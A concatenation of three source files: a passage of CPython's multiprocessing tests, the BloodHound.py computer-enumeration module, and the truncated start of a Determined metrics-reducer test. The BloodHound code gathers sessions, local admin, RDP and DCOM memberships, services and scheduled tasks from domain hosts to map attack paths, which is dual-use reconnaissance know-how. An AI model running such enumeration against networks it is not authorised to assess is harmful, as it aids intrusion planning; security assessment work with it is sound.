ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recurisvely start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, 'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
computers.py
|
####################
#
# Copyright (c) 2018 Fox-IT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
####################
from __future__ import unicode_literals
import queue
import threading
import logging
import traceback
from impacket.dcerpc.v5.rpcrt import DCERPCException
from bloodhound.enumeration.outputworker import OutputWorker
from bloodhound.enumeration.memberships import MembershipEnumerator
from bloodhound.ad.computer import ADComputer
from bloodhound.ad.utils import ADUtils
from future.utils import itervalues, iteritems, native_str
class ComputerEnumerator(MembershipEnumerator):
"""
Class to enumerate computers in the domain.
Contains the threading logic and workers which will call the collection
methods from the bloodhound.ad module.
This class extends the MembershipEnumerator class just to inherit the
membership lookup functions which are also needed for computers.
"""
def __init__(self, addomain, collect, do_gc_lookup=True):
"""
Computer enumeration. Enumerates all computers in the given domain.
Every domain enumerated will get its own instance of this class.
"""
self.addomain = addomain
# Blacklist and whitelist are only used for debugging purposes
self.blacklist = []
self.whitelist = []
self.do_gc_lookup = do_gc_lookup
# Store collection methods specified
self.collect = collect
def enumerate_computers(self, computers, num_workers=10):
"""
Enumerates the computers in the domain. Is threaded, you can specify the number of workers.
Will spawn threads to resolve computers and enumerate the information.
"""
q = queue.Queue()
result_q = queue.Queue()
results_worker = threading.Thread(target=OutputWorker.write_worker, args=(result_q, 'computers.json', 'sessions.json'))
results_worker.daemon = True
results_worker.start()
logging.info('Starting computer enumeration with %d workers', num_workers)
if len(computers) / num_workers > 500:
logging.info('The workload seems to be rather large. Consider increasing the number of workers.')
for _ in range(0, num_workers):
t = threading.Thread(target=self.work, args=(q,result_q))
t.daemon = True
t.start()
for _, computer in iteritems(computers):
if not 'attributes' in computer:
continue
if 'dNSHostName' not in computer['attributes']:
continue
hostname = computer['attributes']['dNSHostName']
if not hostname:
continue
samname = computer['attributes']['sAMAccountName']
# For debugging purposes only
if hostname in self.blacklist:
logging.info('Skipping computer: %s (blacklisted)', hostname)
continue
if len(self.whitelist) > 0 and hostname not in self.whitelist:
logging.info('Skipping computer: %s (not whitelisted)', hostname)
continue
q.put((hostname, samname, computer))
q.join()
result_q.put(None)
result_q.join()
def process_computer(self, hostname, samname, objectsid, entry, results_q):
"""
Processes a single computer, pushes the results of the computer to the given queue.
"""
logging.debug('Querying computer: %s', hostname)
c = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, objectsid=objectsid)
c.primarygroup = self.get_primary_membership(entry)
if c.try_connect() == True:
try:
if 'session' in self.collect:
sessions = c.rpc_get_sessions()
else:
sessions = []
if 'localadmin' in self.collect:
unresolved = c.rpc_get_group_members(544, c.admins)
c.rpc_resolve_sids(unresolved, c.admins)
if 'rdp' in self.collect:
unresolved = c.rpc_get_group_members(555, c.rdp)
c.rpc_resolve_sids(unresolved, c.rdp)
if 'dcom' in self.collect:
unresolved = c.rpc_get_group_members(562, c.dcom)
c.rpc_resolve_sids(unresolved, c.dcom)
if 'loggedon' in self.collect:
loggedon = c.rpc_get_loggedon()
else:
loggedon = []
if 'experimental' in self.collect:
services = c.rpc_get_services()
tasks = c.rpc_get_schtasks()
else:
services = []
tasks = []
c.rpc_close()
# c.rpc_get_domain_trusts()
results_q.put(('computer', c.get_bloodhound_data(entry, self.collect)))
if sessions is None:
sessions = []
# Process found sessions
for ses in sessions:
# For every session, resolve the SAM name in the GC if needed
domain = self.addomain.domain
if self.addomain.num_domains > 1 and self.do_gc_lookup:
try:
users = self.addomain.samcache.get(samname)
except KeyError:
# Look up the SAM name in the GC
users = self.addomain.objectresolver.gc_sam_lookup(ses['user'])
if users is None:
# Unknown user
continue
self.addomain.samcache.put(samname, users)
else:
users = [((u'%s@%s' % (ses['user'], domain)).upper(), 2)]
# Resolve the IP to obtain the host the session is from
try:
target = self.addomain.dnscache.get(ses['source'])
except KeyError:
target = ADUtils.ip2host(ses['source'], self.addomain.dnsresolver, self.addomain.dns_tcp)
# Even if the result is the IP (aka could not resolve PTR) we still cache
# it since this result is unlikely to change during this run
self.addomain.dnscache.put_single(ses['source'], target)
if ':' in target:
# IPv6 address, not very useful
continue
if '.' not in target:
logging.debug('Resolved target does not look like an IP or domain. Assuming hostname: %s', target)
target = '%s.%s' % (target, domain)
# Put the result on the results queue.
for user in users:
results_q.put(('session', {'UserName': user[0].upper(),
'ComputerName': target.upper(),
'Weight': user[1]}))
if loggedon is None:
loggedon = []
# Put the logged on users on the queue too
for user in loggedon:
results_q.put(('session', {'UserName': ('%s@%s' % user).upper(),
'ComputerName': hostname.upper(),
'Weight': 1}))
# Process Tasks
for taskuser in tasks:
try:
user = self.addomain.sidcache.get(taskuser)
except KeyError:
# Resolve SID in GC
userentry = self.addomain.objectresolver.resolve_sid(taskuser)
# Resolve it to an entry and store in the cache
user = ADUtils.resolve_ad_entry(userentry)
self.addomain.sidcache.put(taskuser, user)
logging.debug('Resolved TASK SID to username: %s', user['principal'])
# Use sessions for now
results_q.put(('session', {'UserName': user['principal'].upper(),
'ComputerName': hostname.upper(),
'Weight': 2}))
# Process Services
for serviceuser in services:
# Todo: use own cache
try:
user = self.addomain.sidcache.get(serviceuser)
except KeyError:
# Resolve UPN in GC
userentry = self.addomain.objectresolver.resolve_upn(serviceuser)
# Resolve it to an entry and store in the cache
user = ADUtils.resolve_ad_entry(userentry)
self.addomain.sidcache.put(serviceuser, user)
logging.debug('Resolved Service UPN to username: %s', user['principal'])
# Use sessions for now
results_q.put(('session', {'UserName': user['principal'].upper(),
'ComputerName': hostname.upper(),
'Weight': 2}))
except DCERPCException:
logging.warning('Querying computer failed: %s' % hostname)
except Exception as e:
logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e))
logging.info(traceback.format_exc())
else:
# Write the info we have to the file regardless
try:
results_q.put(('computer', c.get_bloodhound_data(entry, self.collect)))
except Exception as e:
logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e))
logging.info(traceback.format_exc())
def work(self, q, results_q):
"""
Work function, will obtain work from the given queue and will push results on the results_q.
"""
logging.debug('Start working')
while True:
hostname, samname, entry = q.get()
objectsid = entry['attributes']['objectSid']
logging.info('Querying computer: %s', hostname)
self.process_computer(hostname, samname, objectsid, entry, results_q)
q.task_done()
|
test_reducer.py
|
import itertools
import logging
import threading
import traceback
from collections import namedtuple
from typing import Any, Callable, List
import numpy as np
import pytest
from determined import _core
from determined.pytorch import Reducer, _PyTorchReducerContext, _reduce_metrics
logger = logging.getLogger(__name__)
def test_reducer() -> None:
metrics = np.array([0.25, 0.5, 0.75, 1, 25.5, 1.9])
assert np.around(_reduce_metrics(Reducer.AVG, metrics), decimals=2) == 4.98
assert _reduce_metrics(Reducer.SUM, metrics) == 29.9
assert _reduce_metrics(Reducer.MIN, metrics) == 0.25
assert _reduce_metrics(Reducer.MAX, metrics) == 25.5
batches_per_process = [1, 2, 5, 4, 5, 6]
assert np.around(_reduce_metrics(Reducer.AVG, metrics, batches_per_process), decimals=2) == 6.43
DummyDistributedReducerContext = namedtuple(
"DummyDistributedReducerContext", "distributed_context reducer_context wrapped_reducer"
)
def dummy_reducer(values: List) -> Any:
logger.debug(f"reducing {values}")
flat = [v for sublist in values for v in sublist]
return {"values": flat, "sum": sum(flat)}
@pytest.mark.parametrize("cross_size", [1, 3])
@pytest.mark.parametrize("local_size", [1, 3])
def test_custom_reducer_slot_order(cross_size: int, local_size: int) -> None:
size = cross_size * local_size
dataset_size = 47
def do_parallel(fn: Callable) -> List:
"""
Run the same function on one-thread-per-rank, assert there were no exceptions, and return
the results from each rank.
"""
results = [None] * size # type: List
errors = [None] * size # type: List
threads = []
for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)):
rank = cross_rank * local_size + local_rank
